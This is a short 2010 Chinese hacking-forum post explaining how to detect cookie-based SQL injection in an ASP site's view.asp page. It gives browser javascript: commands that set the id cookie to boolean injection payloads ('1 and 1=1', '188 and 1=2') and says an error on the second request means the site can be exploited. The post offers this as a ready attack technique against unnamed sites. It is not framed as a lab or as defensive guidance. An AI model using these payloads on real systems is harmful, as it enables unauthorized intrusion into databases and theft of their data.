WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 2462查看
  • 1回复

主题

好友

2712

积分

禁止访问

发表于 2010-2-7 12:05:05 |显示全部楼层
http://xxxx/view.asp?id=1  
先访问http://xxxx/view.asp?id=1  
接着在浏览器里输入:  
javascript:alert(document.cookie="id="+escape("1 and 1=1"))  
再访问http://xxxx/view.asp(未出错)  
再输入:javascript:alert(document.cookie="id="+escape("188 and 1=2"))  
再访问:http://xxxx/view.asp(出错)  
该页面出错就表示可以用Cookie注入。

主题

好友

36

积分

新手上路

发表于 2010-2-7 23:57:35 |显示全部楼层
提示: 该帖被管理员或版主屏蔽
回复

使用道具 举报

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-5-3 16:51 , Processed in 0.058142 second(s), 16 queries .

返回顶部